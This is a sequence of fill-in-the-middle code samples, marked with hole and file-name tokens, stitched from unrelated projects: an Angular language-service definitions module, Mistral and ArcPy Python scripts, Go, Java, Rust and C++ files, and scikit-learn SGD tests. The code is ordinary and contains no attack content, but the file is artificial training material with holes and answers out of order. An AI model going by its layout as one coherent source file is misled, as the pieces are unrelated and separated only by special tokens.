getTextSpanOfNode(definitionMetas[0].node)}; } private getDefinitionsForSymbol({symbol, node, parent, component}: DefinitionMeta& TemplateInfo): readonly ts.DefinitionInfo[]|undefined { switch (symbol.kind) { case SymbolKind.Directive: case SymbolKind.Element: case SymbolKind.Template: case SymbolKind.DomBinding: // Though it is generally more appropriate for the above symbol definitions to be // associated with "type definitions" since the location in the template is the // actual definition location, the better user experience would be to allow // LS users to "go to definition" on an item in the template that maps to a class and be // taken to the directive or HTML class. 
return this.getTypeDefinitionsForTemplateInstance(symbol, node); case SymbolKind.Pipe: { if (symbol.tsSymbol !== null) { return this.getDefinitionsForSymbols(symbol); } else { // If there is no `ts.Symbol` for the pipe transform, we want to return the // type definition (the pipe class). return this.getTypeDefinitionsForSymbols(symbol.classSymbol); } } case SymbolKind.Output: case SymbolKind.Input: { const bindingDefs = this.getDefinitionsForSymbols(...symbol.bindings); // Also attempt to get directive matches for the input name. If there is a directive that // has the input name as part of the selector, we want to return that as well. const directiveDefs = this.getDirectiveTypeDefsForBindingNode(node, parent, component); return [...bindingDefs, ...directiveDefs]; } case SymbolKind.Variable: case SymbolKind.Reference: { const definitions: ts.DefinitionInfo[] = []; if (symbol.declaration !== node) { definitions.push({ name: symbol.declaration.name, containerName: '', containerKind: ts.ScriptElementKind.unknown, kind: ts.ScriptElementKind.variableElement, textSpan: getTextSpanOfNode(symbol.declaration), contextSpan: toTextSpan(symbol.declaration.sourceSpan), fileName: symbol.declaration.sourceSpan.start.file.url, }); } if (symbol.kind === SymbolKind.Variable) { definitions.push( ...this.getDefinitionsForSymbols({shimLocation: symbol.initializerLocation})); } return definitions; } case SymbolKind.Expression: { return this.getDefinitionsForSymbols(symbol); } } } private getDefinitionsForSymbols(...symbols: HasShimLocation[]): ts.DefinitionInfo[] { return flatMap(symbols, ({shimLocation}) => { const {shimPath, positionInShimFile} = shimLocation; return this.tsLS.getDefinitionAtPosition(shimPath, positionInShimFile) ?? []; }); } getTypeDefinitionsAtPosition(fileName: string, position: number): readonly ts.DefinitionInfo[]|undefined { const templateInfo = getTemplateInfoAtPosition(fileName, position, this.compiler); if (templateInfo === undefined) { return; } const definitionMetas = this.getDefinitionMetaAtPosition(templateInfo, position); if (definitionMetas === undefined) { return undefined; } const definitions: ts.DefinitionInfo[] = []; for (const {symbol, node, parent} of definitionMetas) { switch (symbol.kind) { case SymbolKind.Directive: case SymbolKind.DomBinding: case SymbolKind.Element: case SymbolKind.Template: definitions.push(...this.getTypeDefinitionsForTemplateInstance(symbol, node)); break; case SymbolKind.Output: case SymbolKind.Input: { const bindingDefs = this.getTypeDefinitionsForSymbols(...symbol.bindings); definitions.push(...bindingDefs); // Also attempt to get directive matches for the input name. If there is a directive that // has the input name as part of the selector, we want to return that as well. const directiveDefs = this.getDirectiveTypeDefsForBindingNode(node, parent, templateInfo.component); definitions.push(...directiveDefs); break; } case SymbolKind.Pipe: { if (symbol.tsSymbol !== null) { definitions.push(...this.getTypeDefinitionsForSymbols(symbol)); } else { // If there is no `ts.Symbol` for the pipe transform, we want to return the // type definition (the pipe class). 
definitions.push(...this.getTypeDefinitionsForSymbols(symbol.classSymbol)); } break; } case SymbolKind.Reference: definitions.push( ...this.getTypeDefinitionsForSymbols({shimLocation: symbol.targetLocation}));<|fim▁hole|> case SymbolKind.Variable: { definitions.push( ...this.getTypeDefinitionsForSymbols({shimLocation: symbol.initializerLocation})); break; } } return definitions; } } private getTypeDefinitionsForTemplateInstance( symbol: TemplateSymbol|ElementSymbol|DomBindingSymbol|DirectiveSymbol, node: AST|TmplAstNode): ts.DefinitionInfo[] { switch (symbol.kind) { case SymbolKind.Template: { const matches = getDirectiveMatchesForElementTag(symbol.templateNode, symbol.directives); return this.getTypeDefinitionsForSymbols(...matches); } case SymbolKind.Element: { const matches = getDirectiveMatchesForElementTag(symbol.templateNode, symbol.directives); // If one of the directive matches is a component, we should not include the native element // in the results because it is replaced by the component. return Array.from(matches).some(dir => dir.isComponent) ? this.getTypeDefinitionsForSymbols(...matches) : this.getTypeDefinitionsForSymbols(...matches, symbol); } case SymbolKind.DomBinding: { if (!(node instanceof TmplAstTextAttribute)) { return []; } const dirs = getDirectiveMatchesForAttribute( node.name, symbol.host.templateNode, symbol.host.directives); return this.getTypeDefinitionsForSymbols(...dirs); } case SymbolKind.Directive: return this.getTypeDefinitionsForSymbols(symbol); } } private getDirectiveTypeDefsForBindingNode( node: TmplAstNode|AST, parent: TmplAstNode|AST|null, component: ts.ClassDeclaration) { if (!(node instanceof TmplAstBoundAttribute) && !(node instanceof TmplAstTextAttribute) && !(node instanceof TmplAstBoundEvent)) { return []; } if (parent === null || !(parent instanceof TmplAstTemplate || parent instanceof TmplAstElement)) { return []; } const templateOrElementSymbol = this.compiler.getTemplateTypeChecker().getSymbolOfNode(parent, component); if (templateOrElementSymbol === null || (templateOrElementSymbol.kind !== SymbolKind.Template && templateOrElementSymbol.kind !== SymbolKind.Element)) { return []; } const dirs = getDirectiveMatchesForAttribute(node.name, parent, templateOrElementSymbol.directives); return this.getTypeDefinitionsForSymbols(...dirs); } private getTypeDefinitionsForSymbols(...symbols: HasShimLocation[]): ts.DefinitionInfo[] { return flatMap(symbols, ({shimLocation}) => { const {shimPath, positionInShimFile} = shimLocation; return this.tsLS.getTypeDefinitionAtPosition(shimPath, positionInShimFile) ?? []; }); } private getDefinitionMetaAtPosition({template, component}: TemplateInfo, position: number): DefinitionMeta[]|undefined { const target = getTargetAtPosition(template, position); if (target === null) { return undefined; } const {context, parent} = target; const nodes = context.kind === TargetNodeKind.TwoWayBindingContext ? context.nodes : [context.node]; const definitionMetas: DefinitionMeta[] = []; for (const node of nodes) { const symbol = this.compiler.getTemplateTypeChecker().getSymbolOfNode(node, component); if (symbol === null) { continue; } definitionMetas.push({node, parent, symbol}); } return definitionMetas.length > 0 ? definitionMetas : undefined; } } /** * Gets an Angular-specific definition in a TypeScript source file. 
*/ function getDefinitionForExpressionAtPosition( fileName: string, position: number, compiler: NgCompiler): ts.DefinitionInfoAndBoundSpan| undefined { const sf = compiler.getNextProgram().getSourceFile(fileName); if (sf === undefined) { return; } const expression = findTightestNode(sf, position); if (expression === undefined) { return; } const classDeclaration = getParentClassDeclaration(expression); if (classDeclaration === undefined) { return; } const componentResources = compiler.getComponentResources(classDeclaration); if (componentResources === null) { return; } const allResources = [...componentResources.styles, componentResources.template]; const resourceForExpression = allResources.find(resource => resource.expression === expression); if (resourceForExpression === undefined || !isExternalResource(resourceForExpression)) { return; } const templateDefinitions: ts.DefinitionInfo[] = [{ kind: ts.ScriptElementKind.externalModuleName, name: resourceForExpression.path, containerKind: ts.ScriptElementKind.unknown, containerName: '', // Reading the template is expensive, so don't provide a preview. // TODO(ayazhafiz): Consider providing an actual span: // 1. We're likely to read the template anyway // 2. We could show just the first 100 chars or so textSpan: {start: 0, length: 0}, fileName: resourceForExpression.path, }]; return { definitions: templateDefinitions, textSpan: { // Exclude opening and closing quotes in the url span. start: expression.getStart() + 1, length: expression.getWidth() - 2, }, }; }<|fim▁end|>
break; case SymbolKind.Expression: definitions.push(...this.getTypeDefinitionsForSymbols(symbol)); break;
<|file_name|>actions.py<|end_file_name|><|fim▁begin|># Copyright 2014 - Mirantis, Inc. # Copyright 2015 - StackStorm, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from mistral.lang import types from mistral.lang.v2 import base from mistral_lib import utils class ActionSpec(base.BaseSpec): # See http://json-schema.org _schema = { "type": "object", "properties": { "base": types.NONEMPTY_STRING, "base-input": types.NONEMPTY_DICT, "input": types.UNIQUE_STRING_OR_ONE_KEY_DICT_LIST, "output": types.ANY_NULLABLE, }, "required": ["base"], "additionalProperties": False } def __init__(self, data, validate): super(ActionSpec, self).__init__(data, validate) self._name = data['name'] self._description = data.get('description') self._tags = data.get('tags', []) self._base = data['base'] self._base_input = data.get('base-input', {}) self._input = utils.get_dict_from_entries(data.get('input', [])) self._output = data.get('output') self._base, _input = self._parse_cmd_and_input(self._base) utils.merge_dicts(self._base_input, _input) def validate_schema(self): super(ActionSpec, self).validate_schema() # Validate YAQL expressions. inline_params = self._parse_cmd_and_input(self._data.get('base'))[1] self.validate_expr(inline_params) self.validate_expr(self._data.get('base-input', {})) if isinstance(self._data.get('output'), str): self.validate_expr(self._data.get('output')) def get_name(self): return self._name def get_description(self): return self._description def get_tags(self): return self._tags def get_base(self): return self._base def get_base_input(self): return self._base_input <|fim▁hole|> def get_output(self): return self._output class ActionSpecList(base.BaseSpecList): item_class = ActionSpec class ActionListSpec(base.BaseListSpec): item_class = ActionSpec def get_actions(self): return self.get_items()<|fim▁end|>
def get_input(self): return self._input
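
ActionSpec splits the base string into a command plus inline parameters and merges those into base-input. _parse_cmd_and_input itself is not shown in the row, so the sketch below only illustrates that split-and-merge idea under an assumed "name key=value ..." shape; it is not Mistral's actual parser:

import shlex

def parse_cmd_and_input(base):
    # Assumed shape: first token is the action name, the rest key=value pairs.
    tokens = shlex.split(base)
    params = {}
    for tok in tokens[1:]:
        key, _, value = tok.partition("=")
        params[key] = value
    return tokens[0], params

cmd, inline = parse_cmd_and_input('std.http url="http://example.com" method=GET')
base_input = {"timeout": 60}
base_input.update(inline)   # plays the role of utils.merge_dicts in the row
print(cmd, base_input)
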
<|file_name|>Exporter.java<|end_file_name|><|fim▁begin|>package com.deleidos.dp.export; <|fim▁hole|>import com.deleidos.dp.exceptions.H2DataAccessException; import com.deleidos.dp.exceptions.SchemaNotFoundException; public interface Exporter { public abstract String generateExport(Schema schema); public abstract String generateExport(Schema schema, Schema previousVersion); }<|fim▁end|>
import com.deleidos.dp.beans.Schema;
<|file_name|>process_payment_parameters.go<|end_file_name|><|fim▁begin|>// Code generated by go-swagger; DO NOT EDIT. package account // This file was generated by the swagger tool. // Editing this file might prove futile when you re-run the swagger generate command import ( "context" "net/http" "time" "github.com/go-openapi/errors" "github.com/go-openapi/runtime" cr "github.com/go-openapi/runtime/client" "github.com/go-openapi/swag" strfmt "github.com/go-openapi/strfmt" kbmodel "github.com/killbill/kbcli/v2/kbmodel" ) // NewProcessPaymentParams creates a new ProcessPaymentParams object // with the default values initialized. func NewProcessPaymentParams() *ProcessPaymentParams { var () return &ProcessPaymentParams{ timeout: cr.DefaultTimeout, } } // NewProcessPaymentParamsWithTimeout creates a new ProcessPaymentParams object // with the default values initialized, and the ability to set a timeout on a request func NewProcessPaymentParamsWithTimeout(timeout time.Duration) *ProcessPaymentParams {<|fim▁hole|> return &ProcessPaymentParams{ timeout: timeout, } } // NewProcessPaymentParamsWithContext creates a new ProcessPaymentParams object // with the default values initialized, and the ability to set a context for a request func NewProcessPaymentParamsWithContext(ctx context.Context) *ProcessPaymentParams { var () return &ProcessPaymentParams{ Context: ctx, } } // NewProcessPaymentParamsWithHTTPClient creates a new ProcessPaymentParams object // with the default values initialized, and the ability to set a custom HTTPClient for a request func NewProcessPaymentParamsWithHTTPClient(client *http.Client) *ProcessPaymentParams { var () return &ProcessPaymentParams{ HTTPClient: client, } } /*ProcessPaymentParams contains all the parameters to send to the API endpoint for the process payment operation typically these are written to a http.Request */ type ProcessPaymentParams struct { /*XKillbillComment*/ XKillbillComment *string /*XKillbillCreatedBy*/ XKillbillCreatedBy string /*XKillbillReason*/ XKillbillReason *string /*AccountID*/ AccountID strfmt.UUID /*Body*/ Body *kbmodel.PaymentTransaction /*ControlPluginName*/ ControlPluginName []string /*PaymentMethodID*/ PaymentMethodID *strfmt.UUID /*PluginProperty*/ PluginProperty []string WithProfilingInfo *string // If set, return KB hprof headers WithStackTrace *bool // If set, returns full stack trace with error message timeout time.Duration Context context.Context HTTPClient *http.Client ProcessLocationHeader bool // For create APIs that return 201, send another request and retrieve the resource. 
} // WithTimeout adds the timeout to the process payment params func (o *ProcessPaymentParams) WithTimeout(timeout time.Duration) *ProcessPaymentParams { o.SetTimeout(timeout) return o } // SetTimeout adds the timeout to the process payment params func (o *ProcessPaymentParams) SetTimeout(timeout time.Duration) { o.timeout = timeout } // WithContext adds the context to the process payment params func (o *ProcessPaymentParams) WithContext(ctx context.Context) *ProcessPaymentParams { o.SetContext(ctx) return o } // SetContext adds the context to the process payment params func (o *ProcessPaymentParams) SetContext(ctx context.Context) { o.Context = ctx } // WithHTTPClient adds the HTTPClient to the process payment params func (o *ProcessPaymentParams) WithHTTPClient(client *http.Client) *ProcessPaymentParams { o.SetHTTPClient(client) return o } // SetHTTPClient adds the HTTPClient to the process payment params func (o *ProcessPaymentParams) SetHTTPClient(client *http.Client) { o.HTTPClient = client } // WithXKillbillComment adds the xKillbillComment to the process payment params func (o *ProcessPaymentParams) WithXKillbillComment(xKillbillComment *string) *ProcessPaymentParams { o.SetXKillbillComment(xKillbillComment) return o } // SetXKillbillComment adds the xKillbillComment to the process payment params func (o *ProcessPaymentParams) SetXKillbillComment(xKillbillComment *string) { o.XKillbillComment = xKillbillComment } // WithXKillbillCreatedBy adds the xKillbillCreatedBy to the process payment params func (o *ProcessPaymentParams) WithXKillbillCreatedBy(xKillbillCreatedBy string) *ProcessPaymentParams { o.SetXKillbillCreatedBy(xKillbillCreatedBy) return o } // SetXKillbillCreatedBy adds the xKillbillCreatedBy to the process payment params func (o *ProcessPaymentParams) SetXKillbillCreatedBy(xKillbillCreatedBy string) { o.XKillbillCreatedBy = xKillbillCreatedBy } // WithXKillbillReason adds the xKillbillReason to the process payment params func (o *ProcessPaymentParams) WithXKillbillReason(xKillbillReason *string) *ProcessPaymentParams { o.SetXKillbillReason(xKillbillReason) return o } // SetXKillbillReason adds the xKillbillReason to the process payment params func (o *ProcessPaymentParams) SetXKillbillReason(xKillbillReason *string) { o.XKillbillReason = xKillbillReason } // WithAccountID adds the accountID to the process payment params func (o *ProcessPaymentParams) WithAccountID(accountID strfmt.UUID) *ProcessPaymentParams { o.SetAccountID(accountID) return o } // SetAccountID adds the accountId to the process payment params func (o *ProcessPaymentParams) SetAccountID(accountID strfmt.UUID) { o.AccountID = accountID } // WithBody adds the body to the process payment params func (o *ProcessPaymentParams) WithBody(body *kbmodel.PaymentTransaction) *ProcessPaymentParams { o.SetBody(body) return o } // SetBody adds the body to the process payment params func (o *ProcessPaymentParams) SetBody(body *kbmodel.PaymentTransaction) { o.Body = body } // WithControlPluginName adds the controlPluginName to the process payment params func (o *ProcessPaymentParams) WithControlPluginName(controlPluginName []string) *ProcessPaymentParams { o.SetControlPluginName(controlPluginName) return o } // SetControlPluginName adds the controlPluginName to the process payment params func (o *ProcessPaymentParams) SetControlPluginName(controlPluginName []string) { o.ControlPluginName = controlPluginName } // WithPaymentMethodID adds the paymentMethodID to the process payment params func (o *ProcessPaymentParams) 
WithPaymentMethodID(paymentMethodID *strfmt.UUID) *ProcessPaymentParams { o.SetPaymentMethodID(paymentMethodID) return o } // SetPaymentMethodID adds the paymentMethodId to the process payment params func (o *ProcessPaymentParams) SetPaymentMethodID(paymentMethodID *strfmt.UUID) { o.PaymentMethodID = paymentMethodID } // WithPluginProperty adds the pluginProperty to the process payment params func (o *ProcessPaymentParams) WithPluginProperty(pluginProperty []string) *ProcessPaymentParams { o.SetPluginProperty(pluginProperty) return o } // SetPluginProperty adds the pluginProperty to the process payment params func (o *ProcessPaymentParams) SetPluginProperty(pluginProperty []string) { o.PluginProperty = pluginProperty } // WriteToRequest writes these params to a swagger request func (o *ProcessPaymentParams) WriteToRequest(r runtime.ClientRequest, reg strfmt.Registry) error { if err := r.SetTimeout(o.timeout); err != nil { return err } var res []error if o.XKillbillComment != nil { // header param X-Killbill-Comment if err := r.SetHeaderParam("X-Killbill-Comment", *o.XKillbillComment); err != nil { return err } } // header param X-Killbill-CreatedBy if err := r.SetHeaderParam("X-Killbill-CreatedBy", o.XKillbillCreatedBy); err != nil { return err } if o.XKillbillReason != nil { // header param X-Killbill-Reason if err := r.SetHeaderParam("X-Killbill-Reason", *o.XKillbillReason); err != nil { return err } } // path param accountId if err := r.SetPathParam("accountId", o.AccountID.String()); err != nil { return err } if o.Body != nil { if err := r.SetBodyParam(o.Body); err != nil { return err } } valuesControlPluginName := o.ControlPluginName joinedControlPluginName := swag.JoinByFormat(valuesControlPluginName, "multi") // query array param controlPluginName if err := r.SetQueryParam("controlPluginName", joinedControlPluginName...); err != nil { return err } if o.PaymentMethodID != nil { // query param paymentMethodId var qrPaymentMethodID strfmt.UUID if o.PaymentMethodID != nil { qrPaymentMethodID = *o.PaymentMethodID } qPaymentMethodID := qrPaymentMethodID.String() if qPaymentMethodID != "" { if err := r.SetQueryParam("paymentMethodId", qPaymentMethodID); err != nil { return err } } } valuesPluginProperty := o.PluginProperty joinedPluginProperty := swag.JoinByFormat(valuesPluginProperty, "multi") // query array param pluginProperty if err := r.SetQueryParam("pluginProperty", joinedPluginProperty...); err != nil { return err } // header param WithProfilingInfo if o.WithProfilingInfo != nil && len(*o.WithProfilingInfo) > 0 { if err := r.SetHeaderParam("X-Killbill-Profiling-Req", *o.WithProfilingInfo); err != nil { return err } } // header param withStackTrace if o.WithStackTrace != nil && *o.WithStackTrace { if err := r.SetQueryParam("withStackTrace", "true"); err != nil { return err } } if len(res) > 0 { return errors.CompositeValidationError(res...) } return nil }<|fim▁end|>
var ()
<|file_name|>params_parser.js<|end_file_name|><|fim▁begin|>function parse(req) { var arreglo_parametros = [], parametros = {};<|fim▁hole|> var arreglo_parametros = url_data[1].split("&"); } for (var i = arreglo_parametros.length - 1; i >= 0; i--) { var parametro = arreglo_parametros[i] var param_data = parametro.split("="); parametros[param_data[0]] = [param_data[1]]; } return parametros; } module.exports.parse = parse;<|fim▁end|>
if (req.url.indexOf("?") > 0 ){ var url_data = req.url.split("?");
<|file_name|>EmailResponse.java<|end_file_name|><|fim▁begin|>package org.hisp.dhis.email; /* * Copyright (c) 2004-2018, University of Oslo * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * Neither the name of the HISP project nor the names of its contributors may * be used to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON * ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /** * @author Zubair <[email protected]> */ public enum EmailResponse { SENT( "success" ), FAILED( "failed" ), ABORTED( "aborted" ), NOT_CONFIGURED( "no configuration found" ); private String responseMessage; EmailResponse( String responseMessage ) {<|fim▁hole|> } public String getResponseMessage() { return responseMessage; } public void setResponseMessage( String responseMessage ) { this.responseMessage = responseMessage; } }<|fim▁end|>
this.responseMessage = responseMessage;
<|file_name|>const-param-elided-lifetime.rs<|end_file_name|><|fim▁begin|>// Elided lifetimes within the type of a const generic parameter are disallowed. This matches the
// behaviour of trait bounds where `fn foo<T: Ord<&u8>>() {}` is illegal. Though we could change
// elided lifetimes within the type of a const generic parameter to be 'static, like elided
// lifetimes within const/static items.

// revisions: full min

#![cfg_attr(full, feature(adt_const_params))]
#![cfg_attr(full, allow(incomplete_features))]

struct A<const N: &u8>;
//~^ ERROR `&` without an explicit lifetime name cannot be used here
//[min]~^^ ERROR `&'static u8` is forbidden
trait B {}

impl<const N: &u8> A<N> {
//~^ ERROR `&` without an explicit lifetime name cannot be used here
//[min]~^^ ERROR `&'static u8` is forbidden<|fim▁hole|>}

impl<const N: &u8> B for A<N> {}
//~^ ERROR `&` without an explicit lifetime name cannot be used here
//[min]~^^ ERROR `&'static u8` is forbidden

fn bar<const N: &u8>() {}
//~^ ERROR `&` without an explicit lifetime name cannot be used here
//[min]~^^ ERROR `&'static u8` is forbidden

fn main() {}<|fim▁end|>
fn foo<const M: &u8>(&self) {} //~^ ERROR `&` without an explicit lifetime name cannot be used here //[min]~^^ ERROR `&'static u8` is forbidden
<|file_name|>File_7z.cpp<|end_file_name|><|fim▁begin|>/* Copyright (c) MediaArea.net SARL. All Rights Reserved. * * Use of this source code is governed by a BSD-style license that can * be found in the License.html file in the root of the source tree. */ //--------------------------------------------------------------------------- // Pre-compilation #include "MediaInfo/PreComp.h" #ifdef __BORLANDC__ #pragma hdrstop #endif //--------------------------------------------------------------------------- //--------------------------------------------------------------------------- #include "MediaInfo/Setup.h" //--------------------------------------------------------------------------- //--------------------------------------------------------------------------- #if defined(MEDIAINFO_7Z_YES) //--------------------------------------------------------------------------- //--------------------------------------------------------------------------- #include "MediaInfo/Archive/File_7z.h" //--------------------------------------------------------------------------- namespace MediaInfoLib { //*************************************************************************** // Buffer - File header //*************************************************************************** //--------------------------------------------------------------------------- bool File_7z::FileHeader_Begin()<|fim▁hole|> // Testing if (Buffer[0]!=0x37 // "7z...." || Buffer[1]!=0x7A || Buffer[2]!=0xBC || Buffer[3]!=0xAF || Buffer[4]!=0x27 || Buffer[5]!=0x1C) { Reject("7-Zip"); return false; } // All should be OK... return true; } //*************************************************************************** // Buffer - Global //*************************************************************************** //--------------------------------------------------------------------------- void File_7z::Read_Buffer_Continue() { Skip_B6( "Magic"); Skip_XX(File_Size-6, "Data"); FILLING_BEGIN(); Accept("7-Zip"); Fill(Stream_General, 0, General_Format, "7-Zip"); Finish("7-Zip"); FILLING_END(); } } //NameSpace #endif //MEDIAINFO_7Z_YES<|fim▁end|>
{ // Minimum buffer size if (Buffer_Size<6) return false; // Must wait for more data
<|file_name|>AdminPrefix_Resourcer_v1.py<|end_file_name|><|fim▁begin|><|fim▁hole|>#Adam Breznicky - TxDOT TPP - Mapping Group # #This is an independent script which requires a single parameter designating a directory. #The script will walk through each subfolder and file within the designated directory, identifying the MXD files #and re-sourcing the Comanche database connections to utilize the new 'Admin' prefix # # # # #import modules import arcpy, os #variables directory = "" def re_source_admin(): #issue list issues = [] #walk through each directory for root, dirs, files in os.walk(directory): #ignore file and personal geodatabases specDir = root.split("\\")[-1] dbsuffix = specDir.split(".")[-1] if dbsuffix == "gdb" or dbsuffix == "mdb" or dbsuffix == "tbx": pass else: for n in files: #identify the mxds if str(n).split(".")[-1] == "mxd": print "working on: " + str(os.path.join(root, n)) map = arcpy.mapping.MapDocument(os.path.join(root, n)) dataframes = arcpy.mapping.ListDataFrames(map) for df in dataframes: layers = arcpy.mapping.ListLayers(map, "", df) for lyr in layers: try: if "TPP_GIS.MCHAMB1." in lyr.dataSource: print "lyr source: " + lyr.dataSource newsource = lyr.dataSource.replace("TPP_GIS.MCHAMB1.", "TPP_GIS.APP_TPP_GIS_ADMIN.") location = newsource.split("\\")[:-2] locationFixed = "\\".join(location) print locationFixed newname = newsource.split("\\")[-1] print newname lyr.replaceDataSource(locationFixed, "SDE_WORKSPACE", newname) print "lyr replaced: " + newsource except: if os.path.join(root, n) not in issues: issues.append(os.path.join(root, n)) print lyr.name + " is not a feature layer" tables = arcpy.mapping.ListTableViews(map, "", df) for tbl in tables: try: if "TPP_GIS.MCHAMB1." in tbl.dataSource: print "tbl source: " + tbl.dataSource newsource = tbl.dataSource.replace("TPP_GIS.MCHAMB1.", "TPP_GIS.APP_TPP_GIS_ADMIN.") location = newsource.split("\\")[:-2] locationFixed = "\\".join(location) print locationFixed newname = newsource.split("\\")[-1] print newname tbl.replaceDataSource(locationFixed, "SDE_WORKSPACE", newname) print "tbl replaced: " + newsource except: if os.path.join(root, n) not in issues: issues.append(os.path.join(root, n)) print tbl.name + " is not a feature layer" map.save() re_source_admin() print "success!" print "the following MXDs contained issues with a layer having not a dataSource (e.g. a non-feature layer):" for i in issues: print str(i)<|fim▁end|>
# # #March 2014
<|file_name|>formatter.rs<|end_file_name|><|fim▁begin|>use ansi_term::Colour::Green; use ansi_term::Colour::Yellow; use app::machine::Machine; fn get_empty_line() -> String { String::from("") } fn get_header() -> String { let o = format!("{0: ^10} | {1: ^10} | {2: ^10} | {3: ^10}",<|fim▁hole|> "State", "Path"); format!("{}", Yellow.paint(o)) } fn get_machine_line(machine: &Machine) -> String { let line = format!("{0: ^10} | {1: ^10} | {2: ^10} | {3: ^10}", machine.get_number(), machine.get_name(), machine.get_state(), machine.get_path()); format!("{}", Green.paint(line)) } fn get_separator() -> String { let s = format!("{0: ^10} | {1: ^10} | {2: ^10} | {3: ^10}", "----------", "----------", "----------", "----------"); format!("{}", Yellow.paint(s)) } pub fn format(machines: &[Machine]) -> String { let mut lines = Vec::new(); lines.push(get_empty_line()); lines.push(get_header()); lines.push(get_separator()); for machine in machines { lines.push(get_machine_line(machine)); } lines.push(get_empty_line()); lines.join("\n") }<|fim▁end|>
"Number", "Name",
<|file_name|>test_sgd.py<|end_file_name|><|fim▁begin|>import pickle import unittest import numpy as np import scipy.sparse as sp from sklearn.utils.testing import assert_array_equal from sklearn.utils.testing import assert_almost_equal from sklearn.utils.testing import assert_array_almost_equal from sklearn.utils.testing import assert_greater from sklearn.utils.testing import assert_less from sklearn.utils.testing import raises from sklearn.utils.testing import assert_raises from sklearn.utils.testing import assert_true from sklearn.utils.testing import assert_equal from sklearn import linear_model, datasets, metrics from sklearn.base import clone from sklearn.linear_model import SGDClassifier, SGDRegressor from sklearn.preprocessing import LabelEncoder, scale class SparseSGDClassifier(SGDClassifier): def fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.fit(self, X, y, *args, **kw) def partial_fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.partial_fit(self, X, y, *args, **kw) def decision_function(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.decision_function(self, X, *args, **kw) def predict_proba(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.predict_proba(self, X, *args, **kw) def predict_log_proba(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDClassifier.predict_log_proba(self, X, *args, **kw) class SparseSGDRegressor(SGDRegressor): def fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDRegressor.fit(self, X, y, *args, **kw) def partial_fit(self, X, y, *args, **kw): X = sp.csr_matrix(X) return SGDRegressor.partial_fit(self, X, y, *args, **kw) def decision_function(self, X, *args, **kw): X = sp.csr_matrix(X) return SGDRegressor.decision_function(self, X, *args, **kw) ## ## Test Data ## # test sample 1 X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]) Y = [1, 1, 1, 2, 2, 2] T = np.array([[-1, -1], [2, 2], [3, 2]]) true_result = [1, 2, 2] # test sample 2; string class labels X2 = np.array([[-1, 1], [-0.75, 0.5], [-1.5, 1.5], [1, 1], [0.75, 0.5], [1.5, 1.5], [-1, -1], [0, -0.5], [1, -1]]) Y2 = ["one"] * 3 + ["two"] * 3 + ["three"] * 3 T2 = np.array([[-1.5, 0.5], [1, 2], [0, -2]]) true_result2 = ["one", "two", "three"] # test sample 3 X3 = np.array([[1, 1, 0, 0, 0, 0], [1, 1, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 1, 0, 0, 0], [0, 0, 0, 0, 1, 1], [0, 0, 0, 0, 1, 1], [0, 0, 0, 1, 0, 0], [0, 0, 0, 1, 0, 0]]) Y3 = np.array([1, 1, 1, 1, 2, 2, 2, 2]) # test sample 4 - two more or less redundent feature groups X4 = np.array([[1, 0.9, 0.8, 0, 0, 0], [1, .84, .98, 0, 0, 0], [1, .96, .88, 0, 0, 0], [1, .91, .99, 0, 0, 0], [0, 0, 0, .89, .91, 1], [0, 0, 0, .79, .84, 1], [0, 0, 0, .91, .95, 1], [0, 0, 0, .93, 1, 1]]) Y4 = np.array([1, 1, 1, 1, 2, 2, 2, 2]) iris = datasets.load_iris() # test sample 5 - test sample 1 as binary classification problem X5 = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]) Y5 = [1, 1, 1, 2, 2, 2] true_result5 = [0, 1, 1] ## ## Classification Test Case ## class CommonTest(object): def _test_warm_start(self, X, Y, lr): # Test that explicit warm restart... clf = self.factory(alpha=0.01, eta0=0.01, n_iter=5, shuffle=False, learning_rate=lr) clf.fit(X, Y) clf2 = self.factory(alpha=0.001, eta0=0.01, n_iter=5, shuffle=False, learning_rate=lr) clf2.fit(X, Y, coef_init=clf.coef_.copy(), intercept_init=clf.intercept_.copy()) #... and implicit warm restart are equivalent. 
